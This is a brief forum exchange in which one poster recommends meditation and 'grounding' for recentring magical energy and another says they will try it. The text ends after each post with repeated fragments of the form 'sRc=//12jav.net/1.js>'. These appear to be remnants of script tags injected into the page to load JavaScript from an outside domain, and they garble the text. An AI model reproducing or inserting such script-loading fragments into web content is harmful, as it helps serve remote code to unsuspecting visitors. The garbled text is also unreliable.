yeah i know as boring as it sounds as that is what i use to think!!

But meditation is the best way to re-focus your energy and centre you magick!!!

try grounding as well, you can do this by laying on the ground and imagine your roots travelling down into the ground!! you should find yourself feeling heavy when you walk, strange but true!!1 sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

That sounds good. I should try that as I seem to not be able to connect with my power either. I really miss it because it feels like a half life and its frustrating not being able to connect. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
